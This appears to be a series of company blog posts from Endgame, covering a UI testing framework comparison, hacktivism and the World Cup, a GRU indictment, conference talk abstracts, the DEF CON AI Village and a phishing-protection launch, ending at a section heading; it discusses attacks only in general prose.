    Building an automated UI testing framework required extensive research and collaboration. I sought out experienced guidance to determine project approach, conducted comprehensive research to cast a wide net, participated in thoughtful collaboration to determine framework requirements, and applied structured implementation to grade framework performance.

    Ultimately, I built three versions, duplicated a set of tests across all three and baked into each a different browser automation tool. The version of the framework with the non-Selenium based tool baked into it was the most performant. This blog post discusses the journey to building our automated UI testing framework, including lessons learned for others embarking on similar paths.

     

    Automated UI Testing Frameworks: What They Are & Why They Matter

    In simple terms, a software framework is a set of libraries and tools that allows the user to extend functionality without having to write everything from scratch. It provides users with a “shortcut” to developing an application. Essentially, our automated UI testing framework would contain commands to automate the browser, assertion libraries, and the structure necessary to write UI tests quickly for current and new UI features.

    Easier said than done! Automated UI testing, from the point of view of Front End and QA engineers, is notoriously problematic. Unlike other parts of an application, the UI is perhaps the most frequently developed. In an ideal world, we want our automated tests to reflect the chart results below:

     

    Time and Cost Comparison for UI vs. Automated Testing

     

    The chart represents how over time the cost of manual testing increases. With automated tests, there is expense involved in building, integrating, and maintaining the framework, but a well-built automation framework should remain stable even as an application scales.

    Of course, there is no substitute for manually testing certain features of the UI. Our goal was not to replace all of our manual tests with automated ones. It is difficult to automate tests that would simulate how a user might experience layout, positioning, and UI rendering in different browsers and screen sizes. In some cases, visually testing UI features is the only way to test with accuracy. Instead, we wanted to increase the efficiency of our UI tests by adding an automation framework that would run stably, consistently, with minimal maintenance, and therefore minimal cost.

     

    Testing Strategy

    It takes an experienced understanding of software testing and QA to know how to achieve the right balance of manual, UI, integration (API) and unit tests. The testing diamond shown below represents part of our approach to raising our UI testing efficiency. Notice that the number of UI tests is significantly smaller than integration tests.

    Testing Diamond

     

    In the early days of web development, an application’s UI was responsible for handling business logic and application functionality in addition to rendering the display. For example, the front end of an application would house SQL queries that would pull data from a database, do the work to format it and then hand it to the UI to render.

    Today, most browser-based applications have isolated their business logic to a middle tier of microservices and/or code modules that do that heavy lifting. That all being said, the Endgame QA Team has modeled its testing frameworks in a similar tiered manner. The bulk of the functional testing lives in our middle-tier test framework (written in Python) and exercises each and every API endpoint. Our UI testing framework, no longer burdened with verifying application functionality, can now focus on the UI specifically.

    With the bulk of the functional tests being pushed down to different testing frameworks, the scope of the UI test framework shrank significantly. We further reduced the scope by removing the look and feel of the frontend from this testing framework. Is this button centered relative to that box? Is the text overrunning the page? Is the coloring here matching the coloring there? UI test cases can certainly test those things, but at what cost? Spinning up a browser (even a headless one), logging in and navigating to a page costs time. We have a seven-person manual feature regression testing team that interacts with the application every day and can spot such things more efficiently than any test case.

    So, what will this UI testing framework test then? We decided to keep it focused on high level UI functionality that would prove that the major pages and page components were rendering and that the application was worthy of the next tier of testing. We would verify that:

    1. The user could log in through our application’s interface.
    2. The user could navigate to all of the base pages.
    3. The user could view components that displayed important data on each of the base pages.
    4. The user could navigate to sub pages inside any base pages.

    Smoke tests check that the most important features of the application work and determine if the build is stable enough to continue with further testing. This approach relieves brittleness because this set of UI tests does not rely on all downstream systems working in sync. There are fewer tests to maintain and since the tests are fairly straightforward, maintenance is manageable. With our test strategy in hand, we began the search for a browser automation tool.

     

    Eliciting Requirements

    Collaboration played an important role in identifying the parameters and requirements to guide the design and build of our automated UI testing framework. Our abandoned, non-functional UI framework code served as my primary reference. I first met with its author to discuss pain points and to find out what else was needed to optimize our UI testing. I also regularly attended Front End stand up meetings to share my progress and field questions. Through these discussions it became clear that the end-to-end approach and challenges around how Selenium worked were the major pain points. Now that I had an overall idea of the desired framework and the type of browser automation tool we needed, I began researching frameworks. I cast a wide net to select the top three most highly performant browser automation tools in the industry. I ultimately chose: NightwatchJS, Cypress, and WebdriverIO.

    NightwatchJS is a popular browser automation tool that wraps Selenium and its WebDriver API with its own commands. NightwatchJS includes several favorable capabilities, including auto-managing Selenium sessions, shorter syntax, and support for headless testing. NightwatchJS was also recommended by several colleagues and was an obvious starting point.

    In selecting the second tool, I researched current advances in UI testing by tapping into my networks. I pinged front end developers and QA engineers on various Slack channels. Many of them advised against Selenium due to difficulties managing browser-specific drivers and setting up and tearing down Selenium servers. Engineers in my networks recommended a new browser automation tool, Cypress, built entirely in JavaScript and using its own browser automation engine rather than Selenium. Cypress was gaining buzz as an all-in-one JavaScript browser automation tool.

    To select the final tool, I consulted with our FE team lead. He asked me to build a framework using WebdriverIO. WebdriverIO is currently the most popular and widely used browser automation tool for automated UI testing.

     

    The “Bake-Off”

    To measure the framework’s performance as well as the browser automation tool baked into it, I built three versions. Each version contained a duplicate set of smoke tests that verified: components on the login page, login functionality, navigation to all base pages, and components on each of our major functional pages.

    To build each version, I used a structured process that consisted of the following steps:

    1. Get the browser automation tool up and running by navigating to Google and verifying the page title.
    2. Write test cases for each base page.
    3. Write all tests and browser commands in the same file.
    4. Execute the red/green refactor cycle, a process where tests are run and rewritten until they pass.
    5. Decouple the browser commands from the test code. Our framework architecture replicates the component-based structure of our front end codebase: browser commands are written into their own component helper files, duplicating the organization of our UI components. Organizing files in this way allows us to spend minimal time figuring out where to write tests and browser commands.
    6. Request code reviews from our QA and FE teams and refactor framework code based on their feedback.

    After each implementation, I graded the framework using categories informed by our testing strategy. Since the set of cases was limited to basic UI functionality, we focused on: architecture, speed, and browser compatibility.

    Architecture was important to consider to ensure that the new framework would be compatible with our application and its surrounding infrastructure. Our FE team had experienced issues with Selenium, which automates the browser in a specific way. Both the FE and QA teams were open to exploring new automation tools that were architected in a different way.

    Speed was paramount to framework performance; we want our tests to run efficiently and quickly. To get an accurate measurement, each suite of tests was kicked off from the command line using the Linux time command. Many runs were captured, and an average was generated for comparison.

    We included browser compatibility as a category mainly to share my findings in discussions with the FE team; however, the set of tests we implemented did not rely on it. Users should be able to navigate through base and subpages regardless of browser type. Since Cypress is still new to the industry, WebdriverIO and NightwatchJS scored higher in this category. Fortunately, enthusiastic support for Cypress has encouraged its developers to put a roadmap in place to extend support to all major browsers. In parallel, we plan to continue our manual testing process to evaluate our UI’s cross-browser functionality.

    Based on these categories, if a framework version, along with its browser tool, scored poorly, it received one point; if it scored well, two points; and if it scored excellent, three points.

    I concluded that browser automation tools that did not use Selenium (Cypress) outperformed Selenium-based tools (WebdriverIO & Nightwatch) in the following categories: architecture and speed.  

    See the Summary Comparison Chart below for a snapshot of my findings.

     

    Summary Comparison Chart

     

    In addition, Cypress scored highest for the fastest setup time, with built-in and added features that innovate UI testing. See the chart below for the overall score across a broader range of categories.

     

    Overall Scoring

     

    After analyzing the scores, I confidently recommended the version of the framework which used Cypress since it stood head and shoulders above the rest in almost all of the categories.

     

    Lessons Learned

    I conducted headless tests towards the end of the project for versions of our framework which used WebdriverIO and NightwatchJS. I ran into SSL certificate issues and was unable to redirect the automated browser to our login page. In hindsight, I would have preferred to run headed and headless tests together to solve SSL certificate issues concurrently.

    In addition, I learned how a tool like Selenium automates the browser. Every time a Selenium command is run, for example click, an HTTP request is created and sent to a browser-specific driver. Selenium uses WebDriver, a set of APIs responsible for establishing communication with a browser-specific driver like geckodriver for Firefox, to relay the click command. Geckodriver runs its own HTTP server to receive those requests. The HTTP server determines the steps needed to run the click command, the steps are executed in the browser, the execution status is sent back to the HTTP server, and the HTTP server sends the status back to the automation script.

    Lastly, I learned about innovations in browser automation. For instance, Cypress uses a Node.js server process to constantly communicate, synchronize, and perform tasks. The Node server intercepts all communications between the domain under test and its browser. The site being tested runs in an iframed browser which Cypress controls. The test code executes together with the iframed code, which allows Cypress to control the entire automation process from top to bottom and puts it in the unique position of being able to understand everything happening in and outside of the browser.
     

    Conclusion

    Building an automated UI testing framework can make your UI testing scalable, reliable, efficient, cost-effective, and less brittle. To do so requires casting a wide net during the research process, collaborating with team mates to determine needs, obtaining experienced guidance, building a few versions using recommended browser automation tools, and assessing each version using thoughtful categories. This cyclical process can be applied when building other frameworks.    

    Through this process, I determined that the version of our framework which used a non-Selenium based tool (Cypress) was the most performant. The browser automation tool that customized its API to improve on Selenium (WebdriverIO) outperformed its counterpart (NightwatchJS). While we still perform manual UI tests across various browsers, our automated UI testing framework provides a means for scalable, efficient, and robust testing. With our new automated testing framework in place, when the FE team deploys a new build, the framework will determine whether the build is functional enough for our manual testers to execute tests, allowing us to increase our UI testing efficiency.

    The Growing Reach of Anti-Government Hacktivism: Is the World Cup Next?

    $
    0
    0

    With seismic events already linked to the men’s World Cup, many wonder what other kinds of activities we may see.  Cybersecurity discussions of the World Cup have largely focused on the criminal activity that tends to accompany major global events. In a recent survey, 72% of security professionals expect some sort of attack on this year’s tournament. The anticipated activities range from World Cup-related phishing schemes to device infiltration and surveillance. Many of these malicious activities were present during the men’s World Cup in Brazil four years ago.

    Major political events, such as summits and sporting events, are generally prime targets for nefarious digital activity. This year’s Olympic Destroyer attack during the Winter Olympics is perhaps the most recent example. Given that the men’s World Cup is held in Russia, it is easy to assume Russia itself will not be a target. However, that may be a short-sighted assumption. Increasingly, anti-government groups in authoritarian states target various government-related institutions and events with distributed denial of service (DDoS) attacks or various forms of ‘cyber vandalism’ such as website defacement that may disrupt business activities. Taking a look at this broader trend provides insight into what kind of anti-government cyber activity may occur surrounding the men’s World Cup over the next month.

     

    Anti-Government Protests & Digital Attacks

    Numerous authoritarian governments - such as China, Iran, and Russia - are well-known for the level of sophistication of their state-affiliated cyber groups. What is less discussed is the rise of anti-government hacktivists within these and contiguous states. Anti-government groups employ various kinds of cyber attacks to achieve a variety of objectives. Their motivations range from protesting specific government policies or actions to spotlighting various kinds of corruption or illicit government activity. Of course, in some situations the government itself is not the target, but rather the activities of foreign governments operating within a country are targeted.

    In the case of the men’s World Cup, while the Russian government may not be inclined to target the event itself, both anti-government groups and regional groups fending off Russian interference may very well want to wreak havoc throughout the month-long event. In fact, protests occurred in Brazil in 2014 over the high costs of the World Cup, and coincided with a string of anti-government DDoS and spearphishing attacks. Let’s take a look at a few recent examples of this kind of activity.

    • Venezuela: In 2014, South American anons led an effort targeting government websites following the domestic uprising and protests sparked by increased government censorship and repression. The cyber attacks included both website defacement and DDoS attacks. This quickly turned into a widespread campaign dubbed OpVenezuela. More recently, the Binary Guardians claimed to have hacked 40% of government sites in April 2017, again during a time of heightened tensions.

    • Iran: In May, an anti-government group hacked the systems at an Iranian international airport in protest of military activities in the region. The group took control of the airport monitors and replaced them with anti-government content and a call to protest. They also took control of the email account of a civil aviation head to spread the news. Earlier this month, a group again disrupted an international airport, this time in Tabriz, by turning the monitors off. This is all occurring during a time of heightened censorship in Iran, including the recent extension of the ban on Telegram.

    A Twitter Post from May 24, 2018

     

    • Ukraine: The Ukraine Cyber Alliance aims to counter Russian interference in Ukraine. The network of four groups - CyberHunta, Falcons Flame, Trinity, and RUH8 - targets the Kremlin, and aims to expose Russian interference abroad. Another group, InformNapalm, similarly targets Russia, and was created in response to the annexation of Crimea. The groups have compromised the Duma’s website, leaked emails, and published names of Russian military members, demonstrating a range of behavior all aimed at undermining the Kremlin. In some cases, both the Ukrainian government and other countries have condemned their behavior.

    • Lithuania: The broad impact of Russian trolls continues to garner much attention. To counter their activity, many Lithuanians have taken steps to disrupt Russian propaganda with evidence-based campaigns. Known as the Elves, the group coordinates social media activity to counter Russian disinformation. NATO has since made a video highlighting the anti-propaganda activity.

     

    Digital Activism & the World Cup

    Recently, a Ukrainian artist created a series of alternative World Cup posters to highlight Russian criminal activity and human rights violations. These spread quickly on the internet, and not surprisingly were a hit in Ukraine but attacked in Russia. This kind of activity may well have copycats over the next month as the tournament progresses. With the recent Russian ban on Telegram disrupting major online activity and costing billions, the domestic environment is ripe for the kind of online protest behavior we’ve seen elsewhere across the globe. This does not rule out the potential for a major attack, of course - remember that NotPetya also hit Russia as a self-inflicted wound. However, when looking at the motivations and resources required for various kinds of attacks, the greater likelihood is these kinds of anti-government cyber vandalism attacks with explicit messages and protests. While geopolitical tensions may seep into this global sporting event, we will most certainly see a series of epic goals, and epic dives, that dominate online forums for the remainder of the tournament.



     


    Today's Indictment in Context.....Again

    $
    0
    0

    Today’s indictment continues the uptick in the use of indictments to counter cyber attacks and disinformation which, in conjunction with automation, reflect the authoritarian playbook for interference operations. The indictment charges a dozen members of the Main Intelligence Directorate of the General Staff (GRU) with conducting “large-scale cyber operations to interfere with the 2016 U.S. presidential election”, including the Democratic National Committee (DNC) compromise. This is just the latest high-profile indictment against Russia for election interference and continues the steady beat of indictments against nation-state affiliates for cyber activity.

    As the indictment details, the interference operation employed a series of phishing campaigns, credential theft, and malware to enable data exfiltration. The GRU members used these tactics persistently to compromise Clinton campaign employees and volunteers in addition to the DNC and DCCC compromise, created fake personas (DCLeaks and Guccifer 2.0), and maintained a series of computers located globally to mask their identity and location. The GRU members created fake Facebook and Twitter accounts to launch and promote DCLeaks-related information.  Importantly, the indictment also notes the compromise of a vendor that verifies voter registration, reveals the theft of voter registration information of 500,000 voters by hacking state board of elections websites, and states that the GRU members conducted reconnaissance into county-level election websites in several states.

    This global infrastructure was paid for in cryptocurrency, which is interesting both because it is a popular means for criminals to obfuscate attribution and because Russia previously considered creating its own national cryptocurrency (but later decided it was too risky and instead helped Venezuela create one to circumvent U.S. sanctions). The indictment details the use of both cryptomining and purchasing Bitcoin via currency exchanges.

    This broad range of attacks and targets demonstrates the extreme coordination of Russian interference operations across the spectrum of influence, synchronizing bots, trolls, and cyber attacks as part of a coherent strategy. Given that the twelve individuals likely will never be arrested in the United States, many question the purpose of such indictments. As I’ve previously argued, indictments demonstrate the potential for attribution and the level of capabilities that can provide this evidence, help support a broader deterrence strategy, and have led to arrests previously when those indicted travel outside of Russia. In this case, the indictment can also help disrupt the financial apparatus funding the operation.

    Importantly, this indictment also comes at a time when Russian interference operations extend well beyond elections and include compromise and/or reconnaissance of U.S. critical infrastructure, underwater cables that are core to trillions of dollars of transactions and communications, a global campaign targeting routers, not to mention the NotPetya attack which caused over a billion dollars in damage globally.

    The timing is of course relevant with Monday’s summit between President Donald Trump and Russian President Vladimir Putin. Trump has stated that election interference will be discussed, but currently it appears issues such as Syria, Ukraine, the Middle East, and nuclear proliferation will take precedence over any constructive discussion of further repercussions for Russian interference operations. As the U.S. increasingly employs a range of tools against numerous countries in response to interference operations, today’s indictment signals the vast level of detail and potential for attribution. It also demonstrates that a strategy of naming and shaming will continue in response to the spectrum of malicious digital activity, while potentially contributing to the much needed foundation for a broader deterrence strategy against this behavior.

    Endgame Presents: Hacker Summer Camp 2018

    $
    0
    0

    In just a few weeks, the security industry will flock to Las Vegas for Black Hat, DEF CON, and BSides Las Vegas, also known as “Hacker Summer Camp”. It is one of the biggest weeks in security, and we’re excited to be active contributors at each of the conferences. Our team will be introducing some of our latest research, with presentations on everything from kernel mode threats to phishing detection through artificial vision systems to automated disassembly for malware analysis.

    At Endgame, we believe contributing and collaborating with the community is essential to help elevate the game of defenders, and raise the costs for attackers. We’ll be sharing our independent research at each event, with two talks at Black Hat, one presentation and two workshops at DEF CON, and four talks at BSides Las Vegas. We also are sponsoring and giving a talk at the Diana Initiative, and hope to continue to elevate the voices of gender minorities in security.

    Below are the abstracts, times, dates, and locations for our talks. We will also be at booth #1328 at Black Hat. Swing by, say hi, and take a look at the Endgame platform, named a Visionary by Gartner and proven to empower even novice analysts to conduct the complex and necessary security activities that protect against targeted attacks. See you in Vegas!



     

    Endgame Presents:

     

    BSidesLV

    August 7-8

    Tuscany Suites

     

     

    Presentation: Stop and Step Away from the Data: Rapid Anomaly Detection via Ransom Note File Classification

    Speaker: Mark Mager, Senior Malware Researcher

    Date and Time: August 7, 3:00 PM

    The proliferation of ransomware has become a widespread problem culminating in numerous incidents that have affected users worldwide. Current ransomware detection approaches are limited in that they either take too long to determine if a process is truly malicious or tend to miss certain processes due to focusing solely on static analysis of executables. To address these shortcomings, we developed a machine learning model to classify forensic artifacts common to ransomware infections: ransom notes. Leveraging this model, we built a ransomware detection capability that is more efficient and effective than the status quo.

    I will highlight the limitations to current ransomware detection technologies and how that instigated our new approach, including our research design, data collection, high value features, and how we performed testing to ensure acceptable detection rates while being resilient to false positives. I will also be conducting a live demonstration with ransomware samples to demonstrate our technology's effectiveness. Additionally, we will be releasing all related source code and our model to the public, which will enable users to generate and test their own models, as we hope to further push innovative research on effective ransomware detection capabilities.


     

    Presentation: Sight Beyond Sight: Detecting Phishing with Computer Vision

    Speaker: Daniel Grant, Data Scientist

    Date and Time: August 7, 5:00 PM

    Even with all our advances in security and automated detection, the old cliché still holds true - users are the weakest link. Attacks are crafted to trick users into simple mistakes, such as clicking on a malicious link, enabling macros on an illegitimate document, or entering credentials on a masqueraded website. The best attackers exploit human perception and create reliable and consistent methods to gain unauthorized access to a system without needing to exploit technical vulnerabilities. Although some organizations invest in phishing training and simulation, relying on user attentiveness to detect all attacks that exploit visual similarities is bound to be incomplete. With that in mind, we’ll discuss the option of using machine learning to mimic human perception to detect the visual cues of phishing attacks.

    Deep learning architectures have been used with great success to mimic or exceed human visual perception in well-scoped tasks ranging from identifying cats in Youtube videos to cars in self-driving systems. Rarely have these techniques been applied to information security. Attacks that attempt to exploit human visual perception, such as phishing documents that persuade humans to enable malicious macros, and URL (e.g., www.rnicrosoft.com) and file-based (e.g., chr0me.exe) homoglyph attacks, are ripe for similar automated analysis.

    Our research introduces two methods - SpeedGrapher and Blazar -  for leveraging artificial vision systems and features generated by image creation to detect phishing. SpeedGrapher analyzes the appearance of Microsoft (MS) Word documents via a preview from the Word Interop class to gather images of potential phishing attempts to enable macros and leverages an object detection network to identify relevant visual cues to classify the sample. Blazar analyzes strings for possible domain or filename spoofing and uses a siamese convolutional neural network and a nearest neighbor index to compare visual similarity of spoofs to known domain or file names with a much greater accuracy than edit distance techniques.

    Examples of these methods in action will demonstrate the usefulness of integrating an artificial vision system approach to detect a range of phishing attacks, and we’ll provide some open source tools we’ve used and created in developing these approaches. However, just as the human visual system can be tricked, these machine vision systems can also be exploited. We also show the risk and resilience of these vision systems to evasion attacks.

     

    Presentation: Increasing Retention Capacity: Research from the Field

    Speaker: Andrea Little Limbago, Chief Social Scientist

    Date and Time: August 8, 11:00 AM

    Why do organizations work so hard to recruit a talented workforce, but fall flat when it comes to retention? After all, rapid turnover negates investments in recruiting and training, stalls projects and innovation, and is often a gauge for the health of a company. Given the growing workforce deficit, it is essential to improve retention in security, especially among underrepresented groups. But which factors improve or hinder retention in security? I conducted a survey and integrated existing social science research to identify those core factors. I will first describe the research design and the main findings. Next, building upon existing social science research on social change and organizational structure, I will offer several concrete steps organizations can take to improve retention, including a nuanced approach to professional growth and addressing burnout, as well as key cultural factors within the workplace environment. This discussion also includes what the security industry writ large can do to help augment retention, especially when it comes to professional conferences, marketing, and some of the biases embedded in them.

    Presentation: Who Maed Dis; A Beginners Guide to Malware Provenance Based on Compiler Type

    Speaker: Lucien Brule, Malware Research Intern

    Date and Time: August 8, 2:00 PM

    Malware researchers must take into account a wide range of factors in order to effectively triage, reverse, and address the threat of modern malware. Provenance, or being able to infer the origins of a given sample, is an important but often overlooked characteristic of most malware that may not be apparent to those entering this field. With added knowledge and new tooling, we can make our lives easier. Being able to determine the compiler provenance of a sample is valuable to a reverse engineer, as it can speed up the detection of anomalous or otherwise interesting sections of a given binary. I’ll discuss how different compilers and build systems produce different Windows (PE) binaries, where ‘interesting’ bits of code exist across different kinds of binaries, their expected behavior and defining characteristics, and, most importantly, how to leverage this information to make heuristic conclusions that will improve one’s reverse engineering efficiency.

    The talk also coincides with the public release of two things: a package of YARA rules to fingerprint binaries by compiler type, and a tool which facilitates the analysis of a given binary by providing graphic and diagnostic output that can denote malicious and benign segments. This tool acts as a hinting system for researchers so they can spend less time searching through boring segments of code and more time looking at interesting segments. The tool, combined with the YARA rules, empowers researchers to extend the definitions and add their own for whatever they deem interesting.



     

    Black Hat

    August 8-9

    Mandalay Bay

     

    Presentation: Finding Xori: Malware Analysis Triage with Automated Disassembly

    Speakers: Amanda Rousseau (Senior Malware Researcher) and Rich Seymour (Senior Data Scientist)

    Date and Time: August 8, 10:30 AM, South Seas CDF

    In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.

    Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.

    We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.

     

    Presentation: Kernel Mode Threats and Practical Defenses

    Speakers: Gabriel Landau (Principal Software Engineer) and Joe Desimone (Senior Malware Researcher)

    Date and Time: August 9, 9:45 AM, South Seas ABE

    Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware such as TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. We will examine the techniques from malware such as DoublePulsar, SlingShot, and Turla that help attackers evade endpoint defenses. We will also reveal a novel method to execute a fully kernel mode implant without hitting disk or being detected by security products. The method builds on publicly available tools, which puts it easily within the grasp of novice adversaries.

    While attacker techniques have evolved to evade endpoint protections, the current state of the art in kernel malware detection has also advanced to hinder these new kernel mode threats. We will discuss these new defensive techniques to counter kernel mode threats, including real-time detection techniques that leverage hypervisors along with an innovative hardware-assisted approach that utilizes performance monitoring units. In addition, we will discuss on-demand techniques that leverage page table entry remapping to hunt for kernel malware at scale. To give defenders a leg up, we will release a tool that is effective at thwarting advanced kernel mode threats. Kernel mode threats will only continue to grow in prominence and impact. This talk will provide both the latest attacker techniques in this area and a new tool to curtail these attacks, providing real-world strategies for immediate implementation.




     

    DEF CON

    August 9-12

    Caesar’s Palace

     

    Presentation: Finding Xori: Malware Analysis Triage with Automated Disassembly

    Speakers: Amanda Rousseau (Senior Malware Researcher) and Rich Seymour (Senior Data Scientist)

    Date and Time: August 10, 1:00 PM, Track 2

    In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.

    Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.

    We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.

     

    Workshop: AI Village

    Endgame Speakers: Bobby Filar (Principal Data Scientist), Hyrum Anderson (Technical Director- Data Science), Amanda Rousseau (Senior Malware Researcher), Mark Mager (Senior Malware Researcher), Sven Cattell (Data Scientist)

    Dates: August 10-12, Caesar’s Palace

    The AI Village at DEF CON is a place where experts in AI and security (or both!) can come together to learn and discuss the use, and misuse, of artificial intelligence in traditional security. Machine learning techniques are rapidly being deployed in core security technologies like malware detection and network traffic analysis, but their use has also opened up a variety of new attack vectors against the systems that use them. Using techniques such as Generative Adversarial Networks, would-be attackers could target non-traditional platforms, such as deep learning based image recognition systems used in self driving cars. These same attack methods could be leveraged to extract confidential training data from a deployed model itself, adding another layer of privacy and security risks to an ever-growing list of concerns.

    The AI Village will explore these issues and encourage open discussion for possible solutions (and any interesting attacks the attendees can come up with). For those who would rather learn through practice, a practice workshop session will also be available.

    Come participate in introductory workshops where you can learn how to use (and misuse!) machine learning models as part of your arsenal. Talks include:

     

    • A discussion of the recently released report on the Malicious Use of AI
    • Red-teaming machine learning systems using adversarial techniques
    • Vulnerabilities of machine learning tools
    • (ICYMI) Mark Mager’s BSidesLV talk on ransom note file classification and detection

     

    Workshop: Reverse Engineering Malware 101 (Part of Packet Hacking Village & Workshop)

    Speaker: Amanda Rousseau, Senior Malware Researcher

    Date and Time: August 10, 11:00 AM-12:30 PM, Caesar’s Palace, Promenade Level

    This workshop provides the fundamentals of reverse engineering (RE) Windows malware through hands-on experience with RE tools and techniques. Attendees will be introduced to RE terms and processes, followed by basic x86 assembly and a review of RE tools and malware techniques. It will conclude with attendees performing hands-on malware analysis consisting of Triage, Static, and Dynamic analysis.

    Prerequisites: Basic understanding of programming C/C++, Python, or Java.

    Provided: A virtual machine and tools will be provided.

    Features: 5 Sections in 1.5 hours:

    • ~15 min Fundamentals

    • ~15 min Tools/Techniques

    • ~30 min Triage Static Analysis + Lab

    • ~30 min Dynamic Analysis + Lab




     

    The Diana Initiative

    August 9-10

    Caesar’s Palace

    Presentation: Yes You Can: An Interactive Discussion on CFP Submissions and Presenting at Cons

    Speakers: Andrea Little Limbago, Chief Social Scientist and Kathleen Smith, Chief Marketing Officer at ClearedJobs.net & CyberSecJobs.com

    Date and Time: August 9, 1:30 PM, Track 2

     

    There are (at least) two common and inter-related misperceptions that continue to limit female participation on conference panels and as speakers. First, many conference organizers contend there simply aren’t enough women in the field. Second, many women believe they do not possess the expertise or qualifications to speak at conferences, or even meetups. Neither of these is true, but they reinforce the persistent dearth of technical women speaking at technical conferences. This is especially problematic in security, where we need more visible and prominent women. Moreover, conference participation is a great way to build your brand, grow professionally, and receive useful feedback for a project or research. In this discussion, we’ll share lessons learned and writing tips for pursuing technical speaking opportunities. Participants will leave equipped with the tools and encouragement required to move the needle for greater female speaker representation at security conferences.

    It Takes AI Village

    $
    0
    0

    In early August, security practitioners from around the world will descend upon Las Vegas for a week of talks, demos, and CTFs. The conference lineup of BSides Las Vegas, Black Hat, and DEF CON provides an excellent compendium of topics for novices and the experienced alike. Over the past three years, machine learning (ML) and artificial intelligence (AI) have grown in both discussion and application. Given the growing focus on AI and ML in infosec, it is only natural that a new village focused on AI would be introduced this year at DEF CON. DEF CON has a range of villages, including those on IoT, social engineering, and voting machine hacking, making it an ideal venue to launch something like AI Village.

    The AI Village is a place where practitioners in AI and security (or both!) can come together to learn and discuss the use, and misuse, of artificial intelligence in information security. As AI becomes more common in security platforms, there will be an expectation of knowledge and understanding of how these platforms work and any security risks that AI may introduce. The village will address these issues, help bridge the gap between security practitioners and machine learning researchers, and provide a welcoming home for both at DEF CON.

    The talks scheduled over the 2.5 days range from adversarial machine learning to using the latest deep learning techniques to identify phishing/exploits/ransomware. Additionally, the village will host two panel discussions on core infosec/ML topics: 1) Offensive Machine Learning; and 2) Malware Analysis and Machine Learning. Endgame’s Bobby Filar (@filar) will join other industry experts on the first panel to discuss what ethical boundaries and limits may be required for offensive use cases of ML to prevent incidental damage. Endgame’s Amanda Rousseau (@malwareunicorn) and Hyrum Anderson (@drhyrum) will participate on the second panel to address challenges with ML in infosec by providing the practitioner and data science perspective, respectively.

    The village also will be holding a Capture-the-Flag inspired event to teach attendees a wide range of ML/AI topics. The beginner challenges have walkthroughs to help hackers get started with adversarial AI and other machine learning topics at their own pace, with volunteers standing by to help. The upper limits of the categories have tough questions that will test participants’ ability to understand and execute model attacks and defenses while working with security data. AI Village will draw on numerous open source security data sources, including Ember, the classifier and dataset which Endgame released this past spring.

    If you’ll be attending, be sure to stop by the village and meet our team. We are very excited for the first of hopefully many AI Villages at DEF CON, and to have an opportunity to share our perspective on the numerous topics that must be explored as ML continues to redefine information security.

    It’s the Endgame for Phishing

    $
    0
    0

    With version 3.0 of the Endgame Protection Platform, Endgame has delivered the best prevention against document-based phishing attacks - the execution of malicious documents attached to email or delivered through social channels.  Combined with existing layers of built-in protection, Endgame 3.0 eliminates this major vector of attack while continuing our commitment to transparency, and improving security for customers and the security community. Today, the machine learning component of this technology, the first of its kind, is running publicly in Google’s VirusTotal.

     

    The Prevalence of Phishing for Payload Delivery

    While there are two main strategies for phishing, phishing for credentials and phishing for payload delivery and access, the latter has been the initial attack vector in this year’s high profile attacks on the World Cup, Pyeongchang Winter Olympics, financial, chemical and biological threat prevention labs, and election interference. Research by Verizon makes it clear that document-based phishing remains a prevalent and extremely successful tactic by both criminal groups and nation-states to achieve a range of objectives, from financial gain to espionage to destruction. Targets include not only heads of organizations and individuals with obvious access to the most sensitive information, but people across an organization who can be used as a means to an end.

    Phishing for payload delivery and access is the most direct and reliable way to get attacker code on a user’s machine inside a target of interest.  From that position in a network, an adversary can perform reconnaissance, move laterally, and take desired actions on objectives ranging from data theft to destruction.  Damage from attacks can be accrued over months and even years, with severe losses as a result.

    Defenses against phishing for payload delivery have focused on user training, mail and web filtering, or knowledge of specific malware or attack infrastructure protecting against what is known of previous attacks.  As the success of recent attacks shows, this isn’t working. More must be done to cut off this vector of initial access. Reimagining phishing protection requires a shift. We need to assume that despite best efforts to filter messages and train users, messages will get through and users will click.  To eliminate this access vector, we must more reliably prevent unknown malicious payloads sent to users.

     

    The Endgame Approach to Document-Based Phishing

    Phishing protection has been a cat and mouse game which defenders are losing, with attackers reliably finding ways around approaches focused on filtering, knowledge of infrastructure, and looking for specific malware payloads.  Robust and resilient phishing prevention should not focus only on the delivery and the click, but also on stopping the payload. Current approaches do not effectively prevent novel payloads from running. Endgame revolutionizes payload prevention, protecting customers against both macro-based and non-macro based phishing attacks designed to gain initial access to a computer or network.

     

    Defending Against Macro-Based Phishing Attacks

